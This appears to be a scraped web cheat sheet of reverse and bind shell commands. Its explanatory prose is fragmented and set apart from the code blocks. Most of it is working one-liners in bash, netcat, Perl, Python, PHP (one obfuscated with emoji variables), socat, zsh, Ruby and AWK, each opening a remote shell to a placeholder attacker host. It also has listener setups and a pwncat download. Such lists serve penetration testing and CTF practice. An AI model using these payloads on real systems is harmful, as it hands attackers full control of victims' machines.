Reverse Shell is useful to pass through router and firewalls that may allow outbound connections but not inbound ones.<\/p>\n
Listener: the host that will receive the connection and will take the control of the connected machine.<\/p>\n
In other words, a hacker creates a listener and the victim connects back to it giving full control.<\/p>\n
OUT OF THE BOX<\/strong><\/p>\n Most Linux distributions (certainly Ubuntu 20.04) may have the necessary tools for the following commands.<\/p>\n LISTENER<\/p>\n REVERSE SHELLS<\/p>\n Most of the commands will provide a simple prompt “# ” but the last three will not.<\/p>\n USING PYTHON2<\/strong><\/p>\n Python3 might come already installed on most of the modern distributions but in the case when it is not and Python2 is available…<\/p>\n INSTALLATION<\/p>\n LISTENERS<\/p>\n REVERSE SHELLS<\/p>\n In both cases, a simple prompt “# ” will be available.<\/p>\n USING PHP<\/strong><\/p>\n PHP is an important component of any webserver but it can also run on the shell.<\/p>\n INSTALLATION<\/p>\n LISTENERS<\/p>\n REVERSE SHELLS<\/p>\n Only the first command will offer a simple prompt “# “, all the others will not, and the last one will not hold the prompt on the victim’s side.<\/p>\n USING SOCAT<\/strong><\/p>\n It is a multipurpose relay able to establish multi-directional TCP connections, similar to netcat.<\/p>\n INSTALLATION<\/p>\n LISTENERS<\/p>\n REVERSE SHELLS<\/p>\n The first command will provide a simple prompt “# “.<\/p>\n USING ZSH<\/strong><\/p>\n <\/p>\n INSTALLATION<\/p>\n LISTENERS<\/p>\n REVERSE SHELLS<\/p>\n Unfortunately, it will not offer any prompt.<\/p>\n ADDITIONAL LISTENERS<\/strong><\/p>\n FOR LINUX<\/p>\n FOR WINDOWS<\/p>\n FOR MAC<\/p>\n BIND SHELLS<\/strong><\/p>\n Bind shells are the opposite of the reverse shells. A host listens (bind) on a port waiting for a connection to take control.<\/p>\n BIND (LISTENERS)<\/p>\n CONNECTION<\/p>\n IPv6<\/strong><\/p>\n It might look trivial, but it is not! During the 2025 NSEC CTF Competition, an IPv6-only environment exposed that many popular hacking tools are not prepared.<\/p>\n Listener<\/strong><\/p>\n Victim<\/strong><\/p>\n Note:<\/strong> using a DNS makes the work much easier because the characters nc -lvnp 9001<\/strong><\/pre>\n
sh -i >& \/dev\/tcp\/200.200.200.200<\/strong>\/9001<\/strong> 0>&1<\/pre>\n
exec 5<>\/dev\/tcp\/200.200.200.200<\/strong>\/9001<\/strong>;cat <&5 | while read line; do $line 2>&5 >&5; done<\/pre>\n
rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|sh -i 2>&1|nc 200.200.200.200<\/strong> 9001<\/strong> >\/tmp\/f<\/pre>\n
perl -e 'use Socket;$i=\"200.200.200.200<\/strong>\";$p=9001<\/strong>;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"sh -i\");};'<\/pre>\nexport RHOST=\"200.200.200.200<\/strong>\";export RPORT=9001<\/strong>;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"sh\")'<\/pre>\n
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"200.200.200.200<\/strong>\",9001<\/strong>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")'<\/pre>\n
python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"200.200.200.200<\/strong>\",9001<\/strong>));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'<\/pre>\n
0<&196;exec 196<>\/dev\/tcp\/200.200.200.20<\/strong>0\/9001<\/strong>; sh <&196 >&196 2>&196<\/pre>\n
TF=$(mktemp -u);mkfifo $TF && telnet 200.200.200.200<\/strong> 9001<\/strong> 0<$TF | sh 1>$TF<\/pre>\n
\napt install python<\/pre>\n
nc -lvnp 9001<\/strong><\/pre>\n
ncat -lvnp 9001<\/strong><\/pre>\n
export RHOST=\"200.200.200.200<\/strong>\";export RPORT=9001<\/strong>;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"sh\")'<\/pre>\n
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"200.200.200.200<\/strong>\",9001<\/strong>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"sh\")'<\/pre>\n
\napt install php7.4-cli<\/pre>\n
nc -lvnp 9001<\/strong><\/pre>\n
ncat -lvnp 9001<\/strong><\/pre>\n
php -r '$\ud83d\ude00=\"1\";$\ud83d\ude01=\"2\";$\ud83d\ude05=\"3\";$\ud83d\ude06=\"4\";$\ud83d\ude09=\"5\";$\ud83d\ude0a=\"6\";$\ud83d\ude0e=\"7\";$\ud83d\ude0d=\"8\";$\ud83d\ude1a=\"9\";$\ud83d\ude42=\"0\";$\ud83e\udd22=\" \";$\ud83e\udd13=\"<\";$\ud83e\udd20=\">\";$\ud83d\ude31=\"-\";$\ud83d\ude35=\"&\";$\ud83e\udd29=\"i\";$\ud83e\udd14=\".\";$\ud83e\udd28=\"\/\";$\ud83e\udd70=\"a\";$\ud83d\ude10=\"b\";$\ud83d\ude36=\"i\";$\ud83d\ude44=\"h\";$\ud83d\ude02=\"c\";$\ud83e\udd23=\"d\";$\ud83d\ude03=\"e\";$\ud83d\ude04=\"f\";$\ud83d\ude0b=\"k\";$\ud83d\ude18=\"n\";$\ud83d\ude17=\"o\";$\ud83d\ude19=\"p\";$\ud83e\udd17=\"s\";$\ud83d\ude11=\"x\";$\ud83d\udc80 = $\ud83d\ude04. $\ud83e\udd17. $\ud83d\ude17. $\ud83d\ude02. $\ud83d\ude0b. $\ud83d\ude17. $\ud83d\ude19. $\ud83d\ude03. $\ud83d\ude18;$\ud83d\ude80 = \"200.200.200.200<\/strong>\";$\ud83d\udcbb = 9001<\/strong>;$\ud83d\udc1a = \"sh\". $\ud83e\udd22. $\ud83d\ude31. $\ud83e\udd29. $\ud83e\udd22. $\ud83e\udd13. $\ud83d\ude35. $\ud83d\ude05. $\ud83e\udd22. $\ud83e\udd20. $\ud83d\ude35. $\ud83d\ude05. $\ud83e\udd22. $\ud83d\ude01. $\ud83e\udd20. $\ud83d\ude35. $\ud83d\ude05;$\ud83e\udd23 = $\ud83d\udc80($\ud83d\ude80,$\ud83d\udcbb);$\ud83d\udc7d = $\ud83d\ude03. $\ud83d\ude11. $\ud83d\ude03. $\ud83d\ude02;$\ud83d\udc7d($\ud83d\udc1a);'<\/pre>\n
php -r '$sock=fsockopen(\"200.200.200.200<\/strong>\",9001<\/strong>);exec(\"sh <&3 >&3 2>&3\");'<\/pre>\n
php -r '$sock=fsockopen(\"200.200.200.200<\/strong>\",9001<\/strong>);shell_exec(\"sh <&3 >&3 2>&3\");'<\/pre>\n
php -r '$sock=fsockopen(\"200.200.200.200<\/strong>\",9001<\/strong>);system(\"sh <&3 >&3 2>&3\");'<\/pre>\n
php -r '$sock=fsockopen(\"200.200.200.200<\/strong>\",9001<\/strong>);passthru(\"sh <&3 >&3 2>&3\");'<\/pre>\n
php -r '$sock=fsockopen(\"200.200.200.200<\/strong>\",9001<\/strong>);`sh <&3 >&3 2>&3`;'<\/pre>\n
php -r '$sock=fsockopen(\"200.200.200.200<\/strong>\",9001<\/strong>);popen(\"sh <&3 >&3 2>&3\", \"r\");'<\/pre>\n
php -r '$sock=fsockopen(\"200.200.200.200<\/strong>\",9001<\/strong>);$proc=proc_open(\"sh\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'<\/pre>\n
\napt install socat<\/pre>\n
nc -lvnp 9001<\/strong><\/pre>\n
ncat -lvnp 9001<\/strong><\/pre>\n
socat TCP:200.200.200.200<\/strong>:9001<\/strong> EXEC:'sh',pty,stderr,setsid,sigint,sane<\/pre>\n
socat TCP:200.200.200.200<\/strong>:9001<\/strong> EXEC:sh<\/pre>\n
\napt install zsh<\/pre>\n
nc -lvnp 9001<\/strong><\/pre>\n
ncat -lvnp 9001<\/strong><\/pre>\n
zsh -c 'zmodload zsh\/net\/tcp && ztcp 200.200.200.200<\/strong> 9001<\/strong> && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'<\/pre>\n
\nrlwrap -cAr nc -lvnp 9001<\/strong><\/pre>\n
socat -d -d TCP-LISTEN:9001<\/strong> STDOUT<\/pre>\n
curl https:\/\/raw.githubusercontent.com\/cytopia\/pwncat\/master\/bin\/pwncat > pwncat.py\r\nchmod +x pwncat.py\r\npwncat -l 9001<\/strong>\r\npwncat -l 9001<\/strong> --self-inject \/bin\/bash:127.0.0.1:4444,4445,4446,4447<\/strong>\r\npwncat -l 9001<\/strong> --self-inject \/bin\/bash:127.0.0.1:4444-4447<\/strong>\r\npwncat -l 9001<\/strong> --self-inject \/bin\/bash:127.0.0.1:4444+3<\/strong><\/pre>\n
stty raw -echo; (stty size; cat) | nc -lvnp 9001<\/strong><\/pre>\n
brew install pwncat\r\npython3 -m pwncat -lp 9001<\/strong><\/pre>\n
\npython3 -c 'exec(\"\"\"import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind((\"0.0.0.0\",9001<\/strong>));s1.listen(1);c,a=s1.accept();while True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())\"\"\")'<\/pre>\n
php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,\"0.0.0.0\",9001<\/strong>);socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,\"$ \",2))exit;$in=socket_read($cl,100);$cmd=popen(\"$in\",\"r\");while(!feof($cmd)){$m=fgetc($cmd);socket_write($cl,$m,strlen($m));}}'<\/pre>\nnc 200.200.200.200<\/strong> 9001<\/strong><\/pre>\n
\nsocat -d -d TCP-LISTEN:1337 STDOUT<\/pre>\n
# Socat\r\nsocat TCP:shell.ctf:1337 EXEC:sh\r\nsocat TCP:shell.ctf:1337 EXEC:'sh',pty,stderr,setsid,sigint,sane<\/pre>\n
# BusyBox NetCat\r\nbusybox nc shell.ctf 1337 -e sh<\/pre>\n
# PHP\r\nphp -r '$sock=fsockopen(\"shell.ctf\",1337);exec(\"sh <&3 >&3 2>&3\");'\r\nphp -r '$sock=fsockopen(\"shell.ctf\",1337);shell_exec(\"sh <&3 >&3 2>&3\");'\r\nphp -r '$sock=fsockopen(\"shell.ctf\",1337);system(\"sh <&3 >&3 2>&3\");'\r\nphp -r '$sock=fsockopen(\"shell.ctf\",1337);passthru(\"sh <&3 >&3 2>&3\");'\r\nphp -r '$sock=fsockopen(\"shell.ctf\",1337);`sh <&3 >&3 2>&3`;'\r\nphp -r '$sock=fsockopen(\"shell.ctf\",1337);popen(\"sh <&3 >&3 2>&3\", \"r\");'\r\nphp -r '$sock=fsockopen(\"shell.ctf\",1337);$proc=proc_open(\"sh\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'<\/pre>\n
# Ruby\r\nruby -rsocket -e'exit if fork;c=TCPSocket.new(\"shell.ctf\",\"1337\");loop{c.gets.chomp!;(exit! if $_==\"exit\");($_=~\/cd (.+)\/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts \"failed: #{$_}\"}'<\/pre>\n# AWK\r\nawk 'BEGIN {s = \"\/inet\/tcp\/0\/shell.ctf\/1337\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' \/dev\/null<\/pre>\n:<\/code> that divides the block of the IPv6 address frequently gets mixed with the :<PORT><\/code>. If necessary, wrap the IPv6 in square brackets\u00a0if DNS is not an option (e.g., [fe80::3a07:ba07:63c4:9a36]<\/code>).<\/p>\n
\n